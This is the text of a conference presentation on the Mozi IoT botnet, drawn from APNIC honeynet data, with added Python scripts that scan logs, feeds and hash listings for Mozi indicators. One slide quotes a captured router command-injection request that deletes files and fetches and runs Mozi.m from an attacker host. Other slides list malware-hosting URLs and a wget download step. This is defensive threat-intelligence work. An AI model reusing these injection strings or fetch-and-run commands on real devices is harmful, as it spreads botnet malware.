Observations from the APNIC
Community Honeynet Project
Adli Wahid
Senior Internet Security Specialist APNIC
adli@apnic.net || www.apnic.net
1
Let’s Connect!
• LinkedIn: Adli Wahid
• Email: adli@apnic.net
2
Discussion
1. Background
2. Mozi (IoT) Botnet
3. Observations
4. Mitigation & Remediation
Note: credits to Anutsetsen Enkhzoright (anutsetsen.e@khanbank.com) for initial work on the research & presentation
3
Background (Source of Data)
• APNIC Community Honeynet Project
o Collaboration with partners across AP
o Including capacity building related activities
• Honeypots & Honeynet
o Anything that interacts with the honeypots is suspect
o Confirmed with observed actions + artifacts (payload, logs, etc.)
• Types of Honeypots
o Telnet/SSH (Cowrie) ** relevant for this talk
o 100++ sensors
4
What We Observe
• Attacks that spread via
o SSH & Telnet brute force
o Exploiting _known_ vulnerabilities
• Nature of
o Malware - cryptominers, DDoS agents, etc.
o Source of attack == infected devices*
• Left of the Hack
o Observations on attacker’s infrastructure
o Bot recruitment
o Scripts, malware payload, traffic
• Attacks that no one pays attention to ☺
• Share feeds with network operators (DASH) & partners
5
[Figure: DDoS attack timeline. “Left of the Hack”: build/buy infrastructure (write malware, infect devices, set up Command & Control), followed by “The Hack”.]
Mozi Botnet
• Discovered in September 2019 by Netlab
• Significant outbreak in Sept 2020 (100k nodes)
• Targets IoT devices (MIPS, ARM, PPC and x86)
• Uses unique P2P Command & Control
o BitTorrent Distributed Hash Table (DHT) as carrier protocol
o Makes it robust & tricky* to track
• Some capabilities (from config)
o Perform a DDoS attack
o Update executable from given URL
o Execute command via shell or system()
o DNS spoofing
o HTTP session hijacking (with JS)
o Mining
• Code base from other botnets
o Gafgyt
o Mirai
• Propagation
o 14 HTTP-based exploits via the web interfaces of IoT devices
o Mainly Telnet**, FTP, SSH credential brute-force
6
7
Nmap scan report for host-x.static.[redacted].net (219.x.y.184)
Host is up (0.062s latency).
PORT STATE SERVICE VERSION
53387/tcp open elf-exe ELF 32-bit executable file
This host was serving malware (HTTP on port 53387). Shodan fingerprints the device as a DVR.
Mozi author “taken into custody” by LEA in 2021
https://blog.netlab.360.com/the-mostly-dead-mozi-and-its-lingering-bots/
Is it still around?
8
2022 - Still Active?
durian.fsck.my -- 93.56.202.158[10/Oct/2022:14:24:55 +0900]
"GET/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;
wget+http://93.56.202.158:53157/Mozi.m+-O+/tmp/netgear;
sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 301 0
Check your webserver logs for Mozi.a or Mozi.m
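An added example (not from the slides) of the check the slide asks for: a small Python scanner that parses access-log lines, decodes the injected query parameter, and reports requests that fetch Mozi.a, Mozi.m or the .i stager. The first sample line is the slide's own log entry joined back together; the other sample lines and the path names in them are constructed.

```python
import re
from dataclasses import dataclass, field
from urllib.parse import unquote_plus, urlsplit

# Request line inside an access-log entry: "GET /path?query HTTP/1.0".
# The slide's sample has no space after GET, so the whitespace is optional.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+)\s*(?P<target>\S+)\s+HTTP/[\d.]+"')
URL_RE = re.compile(r'https?://[^\s;&|"\']+')
IPV4_RE = re.compile(r'\b(\d{1,3}(?:\.\d{1,3}){3})\b')
# Payload names the slide tells operators to look for, plus the ".i" stager.
MOZI_NAMES = re.compile(r'^(mozi\.[am]|\.i)$', re.IGNORECASE)
# Shell fragments that indicate a command-injection attempt in a parameter (heuristic).
SHELL_TOKENS = ("wget ", "curl ", "sh ", "rm -rf", "chmod ")

SAMPLE_LOG = [
    # The slide's own log line (wrapped over three lines there), joined back together.
    'durian.fsck.my -- 93.56.202.158[10/Oct/2022:14:24:55 +0900] '
    '"GET/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;'
    'wget+http://93.56.202.158:53157/Mozi.m+-O+/tmp/netgear;'
    'sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 301 0',
    # Constructed benign request.
    '203.0.113.7 - - [10/Oct/2022:14:25:01 +0900] "GET /index.html HTTP/1.1" 200 512',
    # Constructed variant: percent-encoded command fetching Mozi.a with curl.
    '198.51.100.9 - - [10/Oct/2022:14:26:13 +0900] "POST /cgi-bin/example.cgi?cmd='
    'curl%20-o%20/tmp/x%20http://198.51.100.9:41001/Mozi.a%3Bsh%20/tmp/x HTTP/1.1" 404 0',
]


@dataclass
class Hit:
    line_no: int
    source_ip: str
    param: str
    command: str
    download_urls: list = field(default_factory=list)
    mozi_files: list = field(default_factory=list)


def parse_query(query: str):
    """Split a query string on '&' only and decode each value.
    '+' becomes a space, so 'wget+http://...' turns back into a shell command.
    ';' is deliberately not a separator: it is part of the injected command."""
    params = []
    for part in query.split("&"):
        if not part:
            continue
        key, _, value = part.partition("=")
        params.append((unquote_plus(key), unquote_plus(value)))
    return params


def inspect_line(line_no: int, line: str):
    """Return a Hit for the first parameter carrying shell commands or a download URL."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    ip = IPV4_RE.search(line)
    source_ip = ip.group(1) if ip else ""
    for key, value in parse_query(urlsplit(m.group("target")).query):
        urls = URL_RE.findall(value)
        shell = any(tok in value.lower() for tok in SHELL_TOKENS)
        if not (urls or shell):
            continue
        names = [urlsplit(u).path.rsplit("/", 1)[-1] for u in urls]
        return Hit(line_no, source_ip, key, value, urls,
                   [n for n in names if MOZI_NAMES.match(n)])
    return None


def scan_log(lines):
    return [h for h in (inspect_line(n, l) for n, l in enumerate(lines, 1)) if h]


def download_hosts(hits):
    """host:port values serving the payloads, for blocking or for notifying the operator."""
    return sorted({urlsplit(u).netloc for h in hits for u in h.download_urls})


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit.line_no, hit.source_ip, hit.mozi_files, hit.download_urls)
    print(download_hosts(scan_log(SAMPLE_LOG)))
```

A logged status such as 301 says nothing about whether a real device executed the command, so every hit is an attempt: use the host:port list to notify the operator of the serving host or to block it.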
9
Observations in APNIC Honeynet Project
• In 05/2022, we observed an ELF binary “.i” in some URLs
o Post-login downloads
• Pattern looks familiar: http://xxx.xxx.xxx.xxx:random_port/.i
• IP in URL can be the same as attacking host or different
Feed snippet (timestamp, source IP (attacking/spreading), URL of IP hosting binary:random_port, country, ASN):
2022-05-25T11:23:24.433026,59.3.30.251,hxxp://59.3.30.251:10035/.i,KR,4766
2022-05-25T17:27:31.588334,222.174.143.18,hxxp://222.174.143.18:56102/.i,CN,4134
2022-05-26T03:30:41.219380,95.154.75.244,hxxp://95.154.75.244:12107/.i,RU,44724
2022-05-26T06:51:04.319952,37.255.216.173,hxxp://51.19.186.165:23349/.i,IR,58224
2022-05-26T07:58:51.970983,167.179.185.255,hxxp://31.168.218.95:28681/.i,AU,4764
2022-05-26T07:35:24.881174,114.230.69.4,hxxp://114.230.69.4:10816/.i,CN,4134
2022-05-26T08:32:08.109785,167.179.61.43,hxxp://46.237.87.18:9331/.i,HK,135273
10
1. Telnet username:password
2. wget http://x.x.x.x:nnnn/.1
The “.i” & Finding Mozi
• .i: ELF 32-bit LSB executable, ARM, EABI5 version 1 (GNU/Linux), statically linked, stripped
• SHA256: a04ac6d98ad989312783d4fe3456c53730b212c79a426fb215708b6c6daa3de3
o Known to VirusTotal
• Finding Mozi: maybe we can find Mozi.m or Mozi.a on the webserver?
o If .i in $IP:PORT
o Then download $IP:PORT/mozi.a || $IP:PORT/mozi.m || $IP:PORT/Mozi.m || $IP:PORT/Mozi.a || $IP:PORT/config
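An added example (not part of the deck) covering the two slides above: it parses the feed format shown on slide 10, checks each URL against the http://<IPv4>:<random_port>/.i shape, records whether the infected host serves the binary itself or a different host does, and builds the defanged sibling URLs from slide 11 as strings. Five of the slide's own records are embedded; nothing is downloaded.

```python
import csv
import io
import ipaddress
from collections import Counter
from dataclasses import dataclass
from urllib.parse import urlsplit

# Five feed records copied from the slide (defanged hxxp:// as on the slide):
# timestamp, attacking/spreading IP, URL of the binary, country, ASN.
FEED = """\
2022-05-25T11:23:24.433026,59.3.30.251,hxxp://59.3.30.251:10035/.i,KR,4766
2022-05-25T17:27:31.588334,222.174.143.18,hxxp://222.174.143.18:56102/.i,CN,4134
2022-05-26T06:51:04.319952,37.255.216.173,hxxp://51.19.186.165:23349/.i,IR,58224
2022-05-26T07:35:24.881174,114.230.69.4,hxxp://114.230.69.4:10816/.i,CN,4134
2022-05-26T08:32:08.109785,167.179.61.43,hxxp://46.237.87.18:9331/.i,HK,135273
"""

# File names the slide suggests checking for on the same host:port as ".i".
PIVOT_NAMES = ("mozi.a", "mozi.m", "Mozi.m", "Mozi.a", "config")


def refang(url: str) -> str:
    """Turn the feed's defanged scheme back into one urlsplit understands."""
    return url.replace("hxxp://", "http://", 1).replace("hxxps://", "https://", 1)


def is_ipv4(text) -> bool:
    try:
        return ipaddress.ip_address(text).version == 4
    except ValueError:
        return False


@dataclass
class Record:
    ts: str
    source_ip: str
    url: str        # kept defanged, exactly as the feed carries it
    country: str
    asn: int

    @property
    def host(self):
        return urlsplit(refang(self.url)).hostname

    @property
    def port(self):
        return urlsplit(refang(self.url)).port

    @property
    def self_hosted(self) -> bool:
        """The infected device serves the binary itself (the common case on the slide)."""
        return self.host == self.source_ip


def parse_feed(text: str):
    records = []
    for row in csv.reader(io.StringIO(text)):
        if len(row) != 5:
            continue  # skip blank or malformed lines
        ts, src, url, cc, asn = row
        records.append(Record(ts, src, url, cc, int(asn)))
    return records


def matches_pattern(rec: Record) -> bool:
    """http://<IPv4>:<non-default port>/.i, the shape called out on the slide."""
    u = urlsplit(refang(rec.url))
    return (u.scheme == "http" and u.path == "/.i" and is_ipv4(u.hostname)
            and u.port is not None and u.port != 80)


def summarize(records):
    return {
        "total": len(records),
        "self_hosted": sum(r.self_hosted for r in records),
        "third_party_hosted": sum(not r.self_hosted for r in records),
        "by_country": dict(Counter(r.country for r in records)),
        "by_asn": dict(Counter(r.asn for r in records)),
        "port_range": (min(r.port for r in records), max(r.port for r in records)),
    }


def pivot_urls(rec: Record):
    """Candidate sibling files on the hosting host:port, returned defanged (not fetched)."""
    base = rec.url.rsplit("/", 1)[0]
    return [f"{base}/{name}" for name in PIVOT_NAMES]


if __name__ == "__main__":
    recs = parse_feed(FEED)
    print(summarize(recs))
    for r in recs:
        print("self-hosted" if r.self_hosted else "third-party", r.url, pivot_urls(r))
```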
11
Observations – (hash) fingerprints
:~/feeds/dload/20220601/50.83.145.125:43900$ sha256sum * .i
a04ac6d98ad989312783d4fe3456c53730b212c79a426fb215708b6c6daa3de3 mozi.a
a04ac6d98ad989312783d4fe3456c53730b212c79a426fb215708b6c6daa3de3 Mozi.a
a04ac6d98ad989312783d4fe3456c53730b212c79a426fb215708b6c6daa3de3 mozi.m
9bcbb326a28b09faeb6fbfc0e7d68fe6ff79b7248c7b2510aa8dd11cc55e0356 Mozi.m
b82e420c071c1c1a5cbf1ad8ba143f5b804a6fe4fd2fbcd28db20f471b7065ab .i
~/feeds/dload/20220601/222.103.181.173:1117$ sha256sum * .i
479768e26969e241244a475f97b1268fd02e303a8d6b5d15c71b552815cae14b mozi.a
a04ac6d98ad989312783d4fe3456c53730b212c79a426fb215708b6c6daa3de3 Mozi.a
a04ac6d98ad989312783d4fe3456c53730b212c79a426fb215708b6c6daa3de3 mozi.m
a04ac6d98ad989312783d4fe3456c53730b212c79a426fb215708b6c6daa3de3 Mozi.m
6d41f05fe458414332980d420e42b12d01bd21497631f5b6e60fc8082c170bed .i
~/feeds/dload/20221011/36.229.220.191:27611$ sha256sum * .i
23171f17aa39a4b7c9c492c9bc4668697f68e1863c77ef6502e38ca53860c2fa i
b6d6ee5d756cfe9a9638769abef15294d7a9189ac49dc43d9b06fb04976b3bf5 mozi.a
a04ac6d98ad989312783d4fe3456c53730b212c79a426fb215708b6c6daa3de3 Mozi.a
b9410c9df55f3bdfe0cc37f215bbf6d77f85bf5bdad9eb965ad2130f43138657 mozi.m
b9410c9df55f3bdfe0cc37f215bbf6d77f85bf5bdad9eb965ad2130f43138657 Mozi.m
289aba46ba734b2aef8a82dc983ef1451e303fc33c05820dd07cb7551ad1a310 .i
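An added example (not from the deck) that reproduces the comparison across the three listings above: it parses sha256sum output per download host, indexes files by hash, and reports which hashes recur across hosts under different names and whether the .i stager differs from host to host. The listings are copied from the slide; the directory names are the host:port shown in each prompt.

```python
import re
from collections import defaultdict

# The three sha256sum listings from the slide, keyed by the download host:port.
LISTINGS = {
    "50.83.145.125:43900": """
a04ac6d98ad989312783d4fe3456c53730b212c79a426fb215708b6c6daa3de3  mozi.a
a04ac6d98ad989312783d4fe3456c53730b212c79a426fb215708b6c6daa3de3  Mozi.a
a04ac6d98ad989312783d4fe3456c53730b212c79a426fb215708b6c6daa3de3  mozi.m
9bcbb326a28b09faeb6fbfc0e7d68fe6ff79b7248c7b2510aa8dd11cc55e0356  Mozi.m
b82e420c071c1c1a5cbf1ad8ba143f5b804a6fe4fd2fbcd28db20f471b7065ab  .i
""",
    "222.103.181.173:1117": """
479768e26969e241244a475f97b1268fd02e303a8d6b5d15c71b552815cae14b  mozi.a
a04ac6d98ad989312783d4fe3456c53730b212c79a426fb215708b6c6daa3de3  Mozi.a
a04ac6d98ad989312783d4fe3456c53730b212c79a426fb215708b6c6daa3de3  mozi.m
a04ac6d98ad989312783d4fe3456c53730b212c79a426fb215708b6c6daa3de3  Mozi.m
6d41f05fe458414332980d420e42b12d01bd21497631f5b6e60fc8082c170bed  .i
""",
    "36.229.220.191:27611": """
23171f17aa39a4b7c9c492c9bc4668697f68e1863c77ef6502e38ca53860c2fa  i
b6d6ee5d756cfe9a9638769abef15294d7a9189ac49dc43d9b06fb04976b3bf5  mozi.a
a04ac6d98ad989312783d4fe3456c53730b212c79a426fb215708b6c6daa3de3  Mozi.a
b9410c9df55f3bdfe0cc37f215bbf6d77f85bf5bdad9eb965ad2130f43138657  mozi.m
b9410c9df55f3bdfe0cc37f215bbf6d77f85bf5bdad9eb965ad2130f43138657  Mozi.m
289aba46ba734b2aef8a82dc983ef1451e303fc33c05820dd07cb7551ad1a310  .i
""",
}

# sha256sum line: "<64 hex chars>  <name>" ("*name" when run in binary mode).
LINE_RE = re.compile(r'^([0-9a-f]{64})\s+\*?(.+)$')


def parse_sha256sum(text: str):
    """Return {filename: hash} for one listing; lines that do not parse are skipped."""
    files = {}
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            files[m.group(2)] = m.group(1)
    return files


def index_by_hash(listings):
    """hash -> {host: sorted file names carrying that hash}, across every host."""
    idx = defaultdict(lambda: defaultdict(list))
    for host, text in listings.items():
        for name, digest in parse_sha256sum(text).items():
            idx[digest][host].append(name)
    return {d: {h: sorted(n) for h, n in hosts.items()} for d, hosts in idx.items()}


def shared_across_hosts(idx, min_hosts=2):
    """Hashes seen on at least min_hosts hosts: the same binary, whatever it was named."""
    return {d for d, hosts in idx.items() if len(hosts) >= min_hosts}


def names_for(idx, digest):
    return sorted({n for names in idx[digest].values() for n in names})


def stager_hashes(listings, stager=(".i", "i")):
    """Hash of the stager on each host; distinct values mean it differs per host."""
    return {host: [d for n, d in parse_sha256sum(t).items() if n in stager]
            for host, t in listings.items()}


def duplicate_names(listing_text: str):
    """Groups of names in one directory that are byte-identical (case variants etc.)."""
    groups = defaultdict(list)
    for name, digest in parse_sha256sum(listing_text).items():
        groups[digest].append(name)
    return [sorted(g) for g in groups.values() if len(g) > 1]


if __name__ == "__main__":
    idx = index_by_hash(LISTINGS)
    for digest in shared_across_hosts(idx):
        print(digest[:12], "on", len(idx[digest]), "hosts as", names_for(idx, digest))
    print(stager_hashes(LISTINGS))
```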
12
Slowly increasing last 7 months
[Chart: Daily Hits; snapshot on 14/22/2022]
13
IPs from AP Region (Last 7 Months)
[Snippet]
• 2022-12-12T23:57:24.533309,110.x.y.59,hxxp://110.x.y.59:43509/.i [Most Common]
• 2022-08-30T11:07:19.374102,202.x.y.26,hxxp://61.a.b.131:58871/.i [Alternative]
• 2022-10-18T12:34:38.452976,202.x.y.26,hxxp://219.a.b.184:53387/.i [Repeat Offender]
14
[Chart: IPs from AP region by operators (67%)]
Mitigation & Remediation (not just Mozi)
• The Usual Advice
o Harden device – patch, strong credentials, access controls
▪ But whose job is it anyway to monitor & remediate?
▪ Vulnerabilities sustain ‘old’ worms & bots
o TL;DR – same story
o There must be a better way
o Responding after the fact
• Engagement with other stakeholders on the impact of insecure IoTs: awareness, policies, PSIRTs
• Strengthen collaboration & the ecosystem
15
Thank You!
Adli Wahid
<adli@apnic.net>
16
Resources
1. https://blog.netlab.360.com/mozi-another-botnet-using-dht/
2. https://blog.netlab.360.com/the-mostly-dead-mozi-and-its-lingering-bots/
3. Mozi Tools – https://kn0wledge.fr/projects/mozitools/
4. https://www.microsoft.com/security/blog/2021/08/19/how-to-proactively-defend-against-mozi-iot-botnet/
5. ShadowServer Foundation – https://www.shadowserver.org/what-we-do/network-reporting/get-reports/
6. APNIC DASH – https://dash.apnic.net
7. APNIC Community Honeynet Project – adli@apnic.net
17

Observations from the APNIC Community Honeynet Project, presentation by Adli Wahid for the CNCERT International Partnership Conference 2022
